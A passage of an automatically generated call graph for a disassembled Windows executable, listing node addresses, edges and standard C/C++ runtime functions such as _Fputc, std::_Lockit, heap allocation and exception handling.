__ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13381->13383 13382 2d12c2 KiUserExceptionDispatcher 13382->13386 13384 2d1363 13383->13384 13384->13339 13386->13381 13386->13382 13388 2d136e 13386->13388 13404 2d1533 13386->13404 13389 2d138d _strlen 13388->13389 13411 2d197e 13389->13411 13391 2d14c0 13425 2d1ab6 13391->13425 13393 2d1515 13440 2d1a10 13393->13440 13394 2d1466 13394->13391 13402 2d19d8 69 API calls 13394->13402 13398 2d13ad 13398->13391 13400 2d1444 13398->13400 13419 2d19d8 13398->13419 13399 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13401 2d1529 13399->13401 13415 2d408b 13400->13415 13401->13386 13402->13394 13895 2d23c4 13404->13895 13409 2d1a3a 40 API calls 13410 2d1558 13409->13410 13410->13386 13412 2d1995 13411->13412 13413 2d19a6 13412->13413 13444 2d1a3a 13412->13444 13413->13398 13416 2d409a 13415->13416 13418 2d40ad _Yarn 13415->13418 13416->13394 13418->13416 13454 2dc578 13418->13454 13420 2d19e5 13419->13420 13421 2d19ee 13420->13421 13634 2d3c1b 13420->13634 13647 2d3c0b 13420->13647 13658 2d3c29 13420->13658 13421->13398 13426 2d1ae9 13425->13426 13427 2d1ad6 13425->13427 13428 2d1af9 13426->13428 13702 2d5aba 13426->13702 13429 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13427->13429 13705 2d1c57 13428->13705 13430 2d1ae1 13429->13430 13430->13393 13436 2d5aba CallUnexpected RaiseException 13437 2d1b3a 13436->13437 13716 2d1e48 13437->13716 13441 2d1a18 13440->13441 13442 2d151e 13441->13442 13891 2d22fe 13441->13891 13442->13399 13445 2d1a5a 13444->13445 13446 2d1aa2 13444->13446 13448 2d197e 40 API calls 13445->13448 13447 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13446->13447 13449 2d1aad 13447->13449 13450 2d1a64 13448->13450 13449->13413 13451 2d1a9b 13450->13451 13453 2d1ab6 std::ios_base::_Init 40 API calls 13450->13453 13452 2d1a10 40 API calls 13451->13452 13452->13446 13453->13451 13455 2dc58b _Fputc 13454->13455 13458 2dc759 13455->13458 13457 2dc5a0 _Fputc 13457->13416 13459 2dc767 13458->13459 13460 2dc78f 13458->13460 13459->13460 13461 2dc774 13459->13461 13462 2dc796 13459->13462 13460->13457 13474 2db601 13461->13474 13466 2dc81c 13462->13466 13467 2dc828 ___scrt_is_nonwritable_in_current_image 13466->13467 13483 2d875f EnterCriticalSection 13467->13483 13469 2dc836 13484 2dc7d0 13469->13484 13475 2db618 13474->13475 13476 2db611 13474->13476 13481 2db626 13475->13481 13577 2db67e 13475->13577 13573 2d8af0 GetLastError 13476->13573 13479 2db64d 13479->13481 13580 2db485 IsProcessorFeaturePresent 13479->13580 13481->13460 13482 2db67d 13483->13469 13494 2e0bb7 13484->13494 13491 2dc86b 13572 2d8773 LeaveCriticalSection 13491->13572 13493 2dc7ce 13493->13457 13515 2e0c62 13494->13515 13496 2dc7e8 13501 2dc5b2 13496->13501 13497 2e0bc8 _Fputc 13497->13496 13522 2de531 13497->13522 13504 2dc5c4 13501->13504 13506 2dc5ed 13501->13506 13502 2dc5d2 13503 2db601 _Fputc 29 API calls 13502->13503 13503->13506 13504->13502 13504->13506 13509 2dc608 _Yarn 13504->13509 13511 2e0ca0 13506->13511 13509->13506 13535 2dbc27 13509->13535 13541 2e0efc 13509->13541 13548 2e549f 13509->13548 13559 2e5eec 13509->13559 13512 2dc812 13511->13512 13513 2e0cab 13511->13513 13512->13491 13513->13512 13514 2dbc27 ___scrt_uninitialize_crt 64 API calls 13513->13514 13514->13512 13516 2e0c6e _Fputc 13515->13516 13517 2e0c98 13516->13517 13518 2e0efc _Fputc 29 API calls 13516->13518 13517->13497 13519 2e0c89 13518->13519 13520 2e8994 __fread_nolock 29 API calls 13519->13520 13521 2e0c8f 13520->13521 13521->13497 13523 2de56f 13522->13523 13527 2de53f __strnicoll 13522->13527 13524 2dad6d __strnicoll 14 API calls 13523->13524 13526 2de56d 13524->13526 13525 2de55a RtlAllocateHeap 13525->13526 13525->13527 13529 2de4f7 13526->13529 13527->13523 13527->13525 13528 2d8f08 codecvt EnterCriticalSection LeaveCriticalSection 13527->13528 13528->13527 13530 2de502 HeapFree 13529->13530 13534 2de52c 13529->13534 13531 2de517 GetLastError 13530->13531 13530->13534 13532 2de524 __dosmaperr 13531->13532 13533 2dad6d __strnicoll 12 API calls 13532->13533 13533->13534 13534->13496 13536 2dbc40 13535->13536 13540 2dbc67 13535->13540 13537 2e0efc _Fputc 29 API calls 13536->13537 13536->13540 13538 2dbc5c 13537->13538 13539 2e549f _Fputc 64 API calls 13538->13539 13539->13540 13540->13509 13542 2e0f1d 13541->13542 13543 2e0f08 13541->13543 13542->13509 13544 2dad6d __strnicoll 14 API calls 13543->13544 13545 2e0f0d 13544->13545 13546 2db458 __strnicoll 29 API calls 13545->13546 13547 2e0f18 13546->13547 13547->13509 13549 2e54ab ___scrt_is_nonwritable_in_current_image 13548->13549 13550 2e54ec 13549->13550 13552 2e5532 13549->13552 13558 2e54b3 13549->13558 13551 2db601 _Fputc 29 API calls 13550->13551 13551->13558 13553 2e4ef9 __fread_nolock EnterCriticalSection 13552->13553 13554 2e5538 13553->13554 13555 2e5556 13554->13555 13556 2e5283 _Fputc 62 API calls 13554->13556 13557 2e55a8 _Fputc LeaveCriticalSection 13555->13557 13556->13555 13557->13558 13558->13509 13560 2e5f7c 13559->13560 13561 2e0efc _Fputc 29 API calls 13560->13561 13563 2e5f89 13561->13563 13562 2e5f95 13562->13509 13563->13562 13564 2e5fe1 13563->13564 13565 2e5ef7 _Fputc 31 API calls 13563->13565 13564->13562 13566 2e0c62 _Fputc 29 API calls 13564->13566 13571 2e6043 13564->13571 13565->13564 13568 2e6036 13566->13568 13567 2e6072 _Fputc 64 API calls 13569 2e6054 13567->13569 13570 2e7d00 __fread_nolock 14 API calls 13568->13570 13568->13571 13569->13509 13570->13571 13571->13567 13572->13493 13574 2d8b09 13573->13574 13584 2de985 13574->13584 13578 2db689 GetLastError SetLastError 13577->13578 13579 2db6a2 13577->13579 13578->13479 13579->13479 13581 2db491 13580->13581 13628 2db4b9 13581->13628 13585 2de998 13584->13585 13586 2de99e 13584->13586 13606 2df19b 13585->13606 13605 2d8b25 SetLastError 13586->13605 13611 2df1da 13586->13611 13592 2de9e5 13594 2df1da __strnicoll 6 API calls 13592->13594 13593 2de9d0 13595 2df1da __strnicoll 6 API calls 13593->13595 13596 2de9f1 13594->13596 13602 2de9dc 13595->13602 13597 2de9f5 13596->13597 13598 2dea04 13596->13598 13600 2df1da __strnicoll 6 API calls 13597->13600 13623 2dea94 13598->13623 13599 2de4f7 ___free_lconv_mon 14 API calls 13599->13605 13600->13602 13602->13599 13604 2de4f7 ___free_lconv_mon 14 API calls 13604->13605 13605->13475 13607 2df534 std::_Lockit::_Lockit 5 API calls 13606->13607 13608 2df1b7 13607->13608 13609 2df1c0 13608->13609 13610 2df1d2 TlsGetValue 13608->13610 13609->13586 13612 2df534 std::_Lockit::_Lockit 5 API calls 13611->13612 13613 2df1f6 13612->13613 13614 2de9b8 13613->13614 13615 2df214 TlsSetValue 13613->13615 13614->13605 13616 2df807 13614->13616 13621 2df814 __strnicoll 13616->13621 13617 2df854 13620 2dad6d __strnicoll 13 API calls 13617->13620 13618 2df83f HeapAlloc 13619 2de9c8 13618->13619 13618->13621 13619->13592 13619->13593 13620->13619 13621->13617 13621->13618 13622 2d8f08 codecvt EnterCriticalSection LeaveCriticalSection 13621->13622 13622->13621 13624 2debfa __strnicoll EnterCriticalSection LeaveCriticalSection 13623->13624 13625 2deb02 13624->13625 13626 2dec4c __strnicoll 14 API calls 13625->13626 13627 2dea0f 13626->13627 13627->13604 13629 2db4d5 __fread_nolock CallUnexpected 13628->13629 13630 2db501 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13629->13630 13631 2db5d2 CallUnexpected 13630->13631 13632 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13631->13632 13633 2db4a6 GetCurrentProcess TerminateProcess 13632->13633 13633->13482 13635 2d3c22 13634->13635 13639 2d3c6e 13634->13639 13670 2d8773 LeaveCriticalSection 13635->13670 13637 2d3bf9 13637->13421 13638 2d3c27 13638->13421 13639->13421 13639->13637 13640 2d3cf2 13639->13640 13641 2d3cd3 13639->13641 13642 2dc578 69 API calls 13640->13642 13646 2d3ce4 13640->13646 13641->13646 13667 2d35da 13641->13667 13642->13646 13643 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13645 2d3d31 13643->13645 13645->13421 13646->13643 13648 2d3c12 13647->13648 13651 2d3c17 13647->13651 13701 2d875f EnterCriticalSection 13648->13701 13649 2d3c62 13652 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13649->13652 13651->13421 13651->13649 13653 2d3c92 13651->13653 13656 2d3cf2 13651->13656 13654 2d3d31 13652->13654 13653->13649 13655 2d35da _Fputc 68 API calls 13653->13655 13654->13421 13655->13649 13656->13649 13657 2dc578 69 API calls 13656->13657 13657->13649 13662 2d3c45 13658->13662 13663 2d3c4c 13658->13663 13659 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13660 2d3d31 13659->13660 13660->13421 13661 2d35da _Fputc 68 API calls 13661->13662 13662->13659 13663->13662 13664 2d3cf2 13663->13664 13665 2d3c92 13663->13665 13664->13662 13666 2dc578 69 API calls 13664->13666 13665->13661 13665->13662 13666->13662 13671 2dc079 13667->13671 13669 2d35ea 13669->13646 13670->13638 13672 2dc08c _Fputc 13671->13672 13675 2dc0da 13672->13675 13674 2dc09b _Fputc 13674->13669 13676 2dc0e6 ___scrt_is_nonwritable_in_current_image 13675->13676 13677 2dc0ef 13676->13677 13678 2dc113 13676->13678 13679 2db601 _Fputc 29 API calls 13677->13679 13691 2d875f EnterCriticalSection 13678->13691 13690 2dc108 _Fputc 13679->13690 13681 2dc11c 13682 2e0efc _Fputc 29 API calls 13681->13682 13683 2dc131 13681->13683 13682->13683 13684 2dc19d 13683->13684 13685 2dc1ce 13683->13685 13687 2db601 _Fputc 29 API calls 13684->13687 13692 2dc0ad 13685->13692 13687->13690 13688 2dc1da 13697 2dc206 13688->13697 13690->13674 13691->13681 13693 2dc0cc 13692->13693 13694 2dc0bb 13692->13694 13693->13688 13695 2e5eec _Fputc 66 API calls 13694->13695 13696 2dc0c7 13695->13696 13696->13688 13700 2d8773 LeaveCriticalSection 13697->13700 13699 2dc20c 13699->13690 13700->13699 13701->13651 13703 2d5b02 RaiseException 13702->13703 13704 2d5ad4 13702->13704 13703->13428 13704->13703 13706 2d1c7a 13705->13706 13712 2d1b17 13705->13712 13733 2d29d4 AcquireSRWLockExclusive 13706->13733 13708 2d1c84 13708->13712 13738 2d2a89 13708->13738 13713 2d1b3a 13712->13713 13714 2d1e48 std::ios_base::_Init 40 API calls 13713->13714 13715 2d1b2f 13714->13715 13715->13436 13717 2d1e75 _strlen 13716->13717 13718 2d1f5e 13717->13718 13719 2d1e80 13717->13719 13720 2d1860 std::ios_base::_Init 31 API calls 13718->13720 13722 2d1ec8 13719->13722 13723 2d1ed0 13719->13723 13726 2d1e8f _Yarn 13719->13726 13721 2d1f63 13720->13721 13725 2db468 std::ios_base::_Init 29 API calls 13721->13725 13727 2d186a std::ios_base::_Init 31 API calls 13722->13727 13724 2d2952 codecvt 16 API calls 13723->13724 13724->13726 13725->13721 13777 2d1f68 13726->13777 13727->13726 13730 2d1f30 _Deallocate 13731 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13730->13731 13732 2d1b4f 13731->13732 13732->13393 13734 2d29e8 13733->13734 13735 2d29ed ReleaseSRWLockExclusive 13734->13735 13742 2d2a74 SleepConditionVariableSRW 13734->13742 13735->13708 13743 2d2a9e 13738->13743 13741 2d2a23 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 13741->13712 13742->13734 13744 2d2aad 13743->13744 13745 2d2ab4 13743->13745 13749 2daac5 13744->13749 13752 2daa54 13745->13752 13748 2d1c9a 13748->13741 13750 2daa54 std::ios_base::_Init 32 API calls 13749->13750 13751 2daad7 13750->13751 13751->13748 13755 2dacb7 13752->13755 13756 2dacc3 ___scrt_is_nonwritable_in_current_image 13755->13756 13763 2db750 EnterCriticalSection 13756->13763 13758 2dacd1 13764 2daadb 13758->13764 13760 2dacde 13774 2dad06 13760->13774 13763->13758 13765 2daaf6 13764->13765 13772 2dab69 std::_Lockit::_Lockit 13764->13772 13766 2dab49 13765->13766 13768 2e3f46 std::ios_base::_Init 32 API calls 13765->13768 13765->13772 13767 2e3f46 std::ios_base::_Init 32 API calls 13766->13767 13766->13772 13769 2dab5f 13767->13769 13770 2dab3f 13768->13770 13771 2de4f7 ___free_lconv_mon 14 API calls 13769->13771 13773 2de4f7 ___free_lconv_mon 14 API calls 13770->13773 13771->13772 13772->13760 13773->13766 13775 2db767 std::_Lockit::~_Lockit LeaveCriticalSection 13774->13775 13776 2daa85 13775->13776 13776->13748 13778 2d1fa0 13777->13778 13779 2d20be 13778->13779 13780 2d1faa 13778->13780 13781 2d1860 std::ios_base::_Init 31 API calls 13779->13781 13783 2d1fe8 13780->13783 13784 2d1ff0 13780->13784 13790 2d1fb2 _Yarn 13780->13790 13782 2d20c3 13781->13782 13786 2db468 std::ios_base::_Init 29 API calls 13782->13786 13787 2d186a std::ios_base::_Init 31 API calls 13783->13787 13788 2d2952 codecvt 16 API calls 13784->13788 13786->13782 13787->13790 13788->13790 13796 2d20c8 13790->13796 13793 2d2085 _Deallocate 13794 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13793->13794 13795 2d1f0d 13794->13795 13795->13721 13795->13730 13797 2d20f8 13796->13797 13798 2d20ea 13796->13798 13800 2d218a std::ios_base::_Init 40 API calls 13797->13800 13815 2d218a 13798->13815 13803 2d211b 13800->13803 13801 2d213f _Deallocate 13802 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13801->13802 13804 2d2029 13802->13804 13803->13801 13805 2d2185 13803->13805 13807 2d6097 13804->13807 13806 2db468 std::ios_base::_Init 29 API calls 13805->13806 13806->13805 13808 2d60a4 13807->13808 13814 2d2059 13807->13814 13808->13814 13830 2dc994 13808->13830 13811 2d60d1 13846 2dc522 13811->13846 13814->13782 13814->13793 13816 2d21a9 13815->13816 13827 2d224f _Yarn _Deallocate 13815->13827 13817 2d21b8 13816->13817 13818 2d22f3 13816->13818 13819 2d21e3 13817->13819 13823 2d22e8 13817->13823 13825 2d21e9 _Yarn 13817->13825 13820 2d1860 std::ios_base::_Init 31 API calls 13818->13820 13821 2d186a std::ios_base::_Init 31 API calls 13819->13821 13820->13825 13821->13825 13822 2db468 std::ios_base::_Init 29 API calls 13828 2d22fd 13822->13828 13824 2d2952 codecvt 16 API calls 13823->13824 13824->13825 13825->13822 13825->13827 13826 2d2339 13826->13797 13827->13797 13828->13826 13829 2d1ab6 std::ios_base::_Init 40 API calls 13828->13829 13829->13826 13835 2de531 __strnicoll 13830->13835 13831 2de56f 13852 2dad6d 13831->13852 13833 2de55a RtlAllocateHeap 13834 2d60c1 13833->13834 13833->13835 13834->13811 13837 2de16c 13834->13837 13835->13831 13835->13833 13849 2d8f08 13835->13849 13838 2de188 13837->13838 13839 2de17a 13837->13839 13840 2dad6d __strnicoll 14 API calls 13838->13840 13839->13838 13842 2de1a0 13839->13842 13845 2de190 13840->13845 13843 2de19a 13842->13843 13844 2dad6d __strnicoll 14 API calls 13842->13844 13843->13811 13844->13845 13884 2db458 13845->13884 13847 2de4f7 ___free_lconv_mon 14 API calls 13846->13847 13848 2dc53a 13847->13848 13848->13814 13855 2d8f43 13849->13855 13861 2de8d4 GetLastError 13852->13861 13854 2dad72 13854->13834 13856 2d8f4f ___scrt_is_nonwritable_in_current_image 13855->13856 13857 2db750 std::_Lockit::_Lockit EnterCriticalSection 13856->13857 13858 2d8f5a CallUnexpected 13857->13858 13859 2d8f91 codecvt LeaveCriticalSection 13858->13859 13860 2d8f13 13859->13860 13860->13835 13862 2de8ea 13861->13862 13863 2de8f0 13861->13863 13864 2df19b __strnicoll 6 API calls 13862->13864 13865 2df1da __strnicoll 6 API calls 13863->13865 13867 2de8f4 SetLastError 13863->13867 13864->13863 13866 2de90c 13865->13866 13866->13867 13869 2df807 __strnicoll 12 API calls 13866->13869 13867->13854 13870 2de921 13869->13870 13871 2de929 13870->13871 13872 2de93a 13870->13872 13873 2df1da __strnicoll 6 API calls 13871->13873 13874 2df1da __strnicoll 6 API calls 13872->13874 13875 2de937 13873->13875 13876 2de946 13874->13876 13881 2de4f7 ___free_lconv_mon 12 API calls 13875->13881 13877 2de94a 13876->13877 13878 2de961 13876->13878 13880 2df1da __strnicoll 6 API calls 13877->13880 13879 2dea94 __strnicoll 12 API calls 13878->13879 13882 2de96c 13879->13882 13880->13875 13881->13867 13883 2de4f7 ___free_lconv_mon 12 API calls 13882->13883 13883->13867 13887 2db6a7 13884->13887 13886 2db464 13886->13843 13888 2db6b9 _Fputc 13887->13888 13889 2db601 _Fputc 29 API calls 13888->13889 13890 2db6d1 _Fputc 13889->13890 13890->13886 13892 2d2339 13891->13892 13893 2d230b 13891->13893 13892->13442 13893->13892 13894 2d1ab6 std::ios_base::_Init 40 API calls 13893->13894 13894->13892 13896 2d23ea 13895->13896 13912 2d242b 13896->13912 13898 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13899 2d1546 13898->13899 13901 2d233c 13899->13901 13902 2d197e 40 API calls 13901->13902 13903 2d2358 13902->13903 13904 2d2372 13903->13904 13905 2d19d8 69 API calls 13903->13905 13906 2d1ab6 std::ios_base::_Init 40 API calls 13904->13906 13905->13904 13907 2d23a7 13906->13907 13908 2d1a10 40 API calls 13907->13908 13909 2d23ae 13908->13909 13910 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13909->13910 13911 2d1551 13910->13911 13911->13409 13929 2d2cd9 13912->13929 13916 2d245e 13917 2d248c 13916->13917 13943 2d254a 13916->13943 13961 2d2d0a 13917->13961 13919 2d24a8 13921 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13919->13921 13925 2d23f0 13921->13925 13923 2d24bc 13968 2d25d6 13923->13968 13924 2d2483 13955 2d2d7d 13924->13955 13925->13898 13930 2d2cef 13929->13930 13931 2d2ce8 13929->13931 13932 2d244b 13930->13932 13984 2d51f8 EnterCriticalSection 13930->13984 13979 2db77e 13931->13979 13935 2d24c2 13932->13935 13936 2d24fc 13935->13936 13937 2d24d8 13935->13937 13938 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13936->13938 13939 2d2cd9 std::_Lockit::_Lockit 7 API calls 13937->13939 13940 2d2509 13938->13940 13941 2d24e3 13939->13941 13940->13916 13942 2d2d0a std::_Lockit::~_Lockit 2 API calls 13941->13942 13942->13936 13944 2d25bf 13943->13944 13945 2d2563 13943->13945 13946 2d29c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 13944->13946 13945->13944 13947 2d2952 codecvt 16 API calls 13945->13947 13948 2d247b 13946->13948 13949 2d2573 13947->13949 13948->13923 13948->13924 14042 2d25fa 13949->14042 13956 2dc994 _Yarn 15 API calls 13955->13956 13957 2d2d88 13956->13957 13958 2d2d8f 13957->13958 14214 2d31b3 13957->14214 13958->13917 13962 2db78c 13961->13962 13963 2d2d14 13961->13963 14219 2db767 LeaveCriticalSection 13962->14219 13964 2d2d27 13963->13964 14218 2d5206 LeaveCriticalSection 13963->14218 13964->13919 13967 2db793 13967->13919 13969 2d25fa 13968->13969 13970 2d5aba CallUnexpected RaiseException 13968->13970 13971 2d2cd9 std::_Lockit::_Lockit 7 API calls 13969->13971 13970->13969 13972 2d260b 13971->13972 13973 2d2635 13972->13973 13974 2d2647 13972->13974 13975 2d2dff codecvt 65 API calls 13973->13975 13976 2d31f0 codecvt 31 API calls 13974->13976 13977 2d24c1 13975->13977 13978 2d2651 13976->13978 13985 2df432 13979->13985 13984->13932 14006 2df5b9 13985->14006 14005 2df464 14005->14005 14036 2df534 14006->14036 14008 2df437 14009 2df5d3 14008->14009 14010 2df534 std::_Lockit::_Lockit 5 API calls 14009->14010 14011 2df43c 14010->14011 14012 2df5ed 14011->14012 14013 2df534 std::_Lockit::_Lockit 5 API calls 14012->14013 14014 2df441 14013->14014 14015 2df607 14014->14015 14016 2df534 std::_Lockit::_Lockit 5 API calls 14015->14016 14017 2df446 14016->14017 14018 2df621 14017->14018 14019 2df534 std::_Lockit::_Lockit 5 API calls 14018->14019 14020 2df44b 14019->14020 14021 2df63b 14020->14021 14022 2df534 std::_Lockit::_Lockit 5 API calls 14021->14022 14023 2df450 14022->14023 14024 2df655 14023->14024 14025 2df534 std::_Lockit::_Lockit 5 API calls 14024->14025 14026 2df455 14025->14026 14027 2df66f 14026->14027 14028 2df534 std::_Lockit::_Lockit 5 API calls 14027->14028 14029 2df45a 14028->14029 14030 2df689 14029->14030 14031 2df534 std::_Lockit::_Lockit 5 API calls 14030->14031 14032 2df45f 14031->14032 14033 2df6a3 14032->14033 14034 2df534 std::_Lockit::_Lockit 5 API calls 14033->14034 14035 2df6b9 14034->14035 14035->14005 14037 2df564 14036->14037 14041 2df560 std::_Lockit::_Lockit 14036->14041 14038 2df469 std::_Lockit::_Lockit LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 14037->14038 14037->14041 14039 2df578 14038->14039 14040 2df57e GetProcAddress 14039->14040 14039->14041 14040->14041 14041->14008 14043 2d2cd9 std::_Lockit::_Lockit 7 API calls 14042->14043 14044 2d260b 14043->14044 14045 2d2635 14044->14045 14046 2d2647 14044->14046 14078 2d2dff 14045->14078 14087 2d31f0 14046->14087 14051 2d4915 14122 2d8588 14051->14122 14053 2d491e __Getctype 14054 2d4938 14053->14054 14055 2d4956 14053->14055 14127 2d88c6 14054->14127 14057 2d88c6 __Getctype 39 API calls 14055->14057 14058 2d493f 14057->14058 14132 2d8561 14058->14132 14061 2d25b3 14063 2d2652 14061->14063 14210 2d2e4b 14063->14210 14066 2d266b 14068 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14066->14068 14071 2d2682 14066->14071 14067 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14067->14066 14068->14071 14069 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14072 2d2699 14069->14072 14070 2d26b0 14074 2d26c7 14070->14074 14075 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14070->14075 14071->14069 14071->14072 14072->14070 14073 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14072->14073 14073->14070 14076 2d26de 14074->14076 14077 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14074->14077 14075->14074 14077->14076 14094 2dc99f 14078->14094 14082 2d2e24 14083 2d2e33 14082->14083 14084 2dc99f std::_Locinfo::_Locinfo_dtor 64 API calls 14082->14084 14085 2d2e65 _Yarn 15 API calls 14083->14085 14084->14083 14086 2d259b 14085->14086 14086->14051 14113 2d3292 14087->14113 14090 2d5aba CallUnexpected RaiseException 14091 2d320f 14090->14091 14116 2d1918 14091->14116 14095 2df432 std::_Lockit::_Lockit 5 API calls 14094->14095 14096 2dc9ac 14095->14096 14105 2dcbd1 14096->14105 14099 2d2e65 14100 2d2e9e _Yarn 14099->14100 14101 2d2e73 14099->14101 14100->14082 14102 2d2e7f 14101->14102 14103 2dc522 std::locale::_Locimp::~_Locimp 14 API calls 14101->14103 14102->14100 14104 2dc994 _Yarn 15 API calls 14102->14104 14103->14102 14104->14100 14106 2dcbdd ___scrt_is_nonwritable_in_current_image 14105->14106 14107 2db750 std::_Lockit::_Lockit EnterCriticalSection 14106->14107 14108 2dcbeb 14107->14108 14109 2dca72 std::_Locinfo::_Locinfo_dtor 64 API calls 14108->14109 14110 2dcbf8 14109->14110 14111 2dcc20 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 14110->14111 14112 2d2e0c 14111->14112 14112->14099 14119 2d3155 14113->14119 14117 2d6097 ___std_exception_copy 30 API calls 14116->14117 14118 2d193a 14117->14118 14120 2d6097 ___std_exception_copy 30 API calls 14119->14120 14121 2d3181 14120->14121 14121->14090 14146 2de783 GetLastError 14122->14146 14128 2de783 _unexpected 39 API calls 14127->14128 14129 2d88d1 14128->14129 14130 2ded66 __Getctype 39 API calls 14129->14130 14131 2d88e1 14130->14131 14131->14058 14133 2de783 _unexpected 39 API calls 14132->14133 14134 2d856c 14133->14134 14135 2ded66 __Getctype 39 API calls 14134->14135 14136 2d4967 14135->14136 14136->14061 14137 2db963 14136->14137 14138 2db970 14137->14138 14142 2db9ab 14137->14142 14139 2dc994 _Yarn 15 API calls 14138->14139 14140 2db993 14139->14140 14140->14142 14201 2dee22 14140->14201 14142->14061 14144 2db485 __Getctype 11 API calls 14145 2db9c1 14144->14145 14147 2de799 14146->14147 14148 2de79f 14146->14148 14149 2df19b __strnicoll 6 API calls 14147->14149 14150 2df1da __strnicoll 6 API calls 14148->14150 14152 2de7a3 SetLastError 14148->14152 14149->14148 14151 2de7bb 14150->14151 14151->14152 14154 2df807 __strnicoll 14 API calls 14151->14154 14156 2de838 14152->14156 14157 2d8593 14152->14157 14155 2de7d0 14154->14155 14158 2de7e9 14155->14158 14159 2de7d8 14155->14159 14177 2db9c2 14156->14177 14173 2ded66 14157->14173 14162 2df1da __strnicoll 6 API calls 14158->14162 14161 2df1da __strnicoll 6 API calls 14159->14161 14170 2de7e6 14161->14170 14164 2de7f5 14162->14164 14165 2de7f9 14164->14165 14166 2de810 14164->14166 14167 2df1da __strnicoll 6 API calls 14165->14167 14169 2dea94 __strnicoll 14 API calls 14166->14169 14167->14170 14168 2de4f7 ___free_lconv_mon 14 API calls 14168->14152 14171 2de81b 14169->14171 14170->14168 14172 2de4f7 ___free_lconv_mon 14 API calls 14171->14172 14172->14152 14174 2ded79 14173->14174 14175 2d85a3 14173->14175 14174->14175 14188 2e2046 14174->14188 14175->14053 14178 2e08cc CallUnexpected EnterCriticalSection LeaveCriticalSection 14177->14178 14179 2db9c7 14178->14179 14180 2db9d2 14179->14180 14181 2e08f3 CallUnexpected 38 API calls 14179->14181 14182 2db9dc IsProcessorFeaturePresent 14180->14182 14183 2db9fb 14180->14183 14181->14180 14185 2db9e8 14182->14185 14184 2d8bec CallUnexpected 21 API calls 14183->14184 14187 2dba05 14184->14187 14186 2db4b9 CallUnexpected 8 API calls 14185->14186 14186->14183 14189 2e2052 ___scrt_is_nonwritable_in_current_image 14188->14189 14190 2de783 _unexpected 39 API calls 14189->14190 14191 2e205b 14190->14191 14192 2db750 std::_Lockit::_Lockit EnterCriticalSection 14191->14192 14193 2e20a1 14191->14193 14194 2e2079 14192->14194 14193->14175 14195 2e20c7 __Getctype 14 API calls 14194->14195 14196 2e208a 14195->14196 14197 2e20a6 __Getctype LeaveCriticalSection 14196->14197 14198 2e209d 14197->14198 14198->14193 14199 2db9c2 CallUnexpected 39 API calls 14198->14199 14200 2e20c6 14199->14200 14202 2dee30 14201->14202 14203 2dee3e 14201->14203 14202->14203 14205 2dee58 14202->14205 14204 2dad6d __strnicoll 14 API calls 14203->14204 14209 2dee48 14204->14209 14207 2db9a4 14205->14207 14208 2dad6d __strnicoll 14 API calls 14205->14208 14206 2db458 __strnicoll 29 API calls 14206->14207 14207->14142 14207->14144 14208->14209 14209->14206 14211 2d2e57 14210->14211 14212 2d265b 14210->14212 14213 2dc99f std::_Locinfo::_Locinfo_dtor 64 API calls 14211->14213 14212->14066 14212->14067 14213->14212 14215 2d31c1 Concurrency::cancel_current_task 14214->14215 14216 2d5aba CallUnexpected RaiseException 14215->14216 14217 2d31cf 14216->14217 14218->13964 14219->13967 14221 2d5aba CallUnexpected RaiseException 14220->14221 14222 2d18b4 14221->14222 14223 2d6097 ___std_exception_copy 30 API calls 14222->14223 14224 2d18d6 14223->14224 14224->13349 14225->13372 14231 2d3258 14226->14231 14229 2d5aba CallUnexpected RaiseException 14230 2d31ef 14229->14230 14232 2d3155 std::exception::exception 30 API calls 14231->14232 14233 2d31e1 14232->14233 14233->14229 17373 2d416b 17374 2d417f 17373->17374 17375 2d43df 69 API calls 17374->17375 17380 2d41da 17374->17380 17376 2d41aa 17375->17376 17377 2d41c7 17376->17377 17378 2dae1d 67 API calls 17376->17378 17376->17380 17377->17380 17381 2dc01e 17377->17381 17378->17377 17382 2dc03e 17381->17382 17383 2dc029 17381->17383 17384 2dc05b 17382->17384 17385 2dc046 17382->17385 17386 2dad6d __strnicoll 14 API calls 17383->17386 17395 2e4217 17384->17395 17387 2dad6d __strnicoll 14 API calls 17385->17387 17389 2dc02e 17386->17389 17390 2dc04b 17387->17390 17391 2db458 __strnicoll 29 API calls 17389->17391 17392 2db458 __strnicoll 29 API calls 17390->17392 17394 2dc039 17391->17394 17393 2dc056 17392->17393 17393->17380 17394->17380 17396 2e422b _Fputc 17395->17396 17399 2e47c0 17396->17399 17398 2e4237 _Fputc 17398->17393 17400 2e47cc ___scrt_is_nonwritable_in_current_image 17399->17400 17401 2e47f6 17400->17401 17402 2e47d3 17400->17402 17410 2d875f EnterCriticalSection 17401->17410 17404 2db601 _Fputc 29 API calls 17402->17404 17409 2e47ec 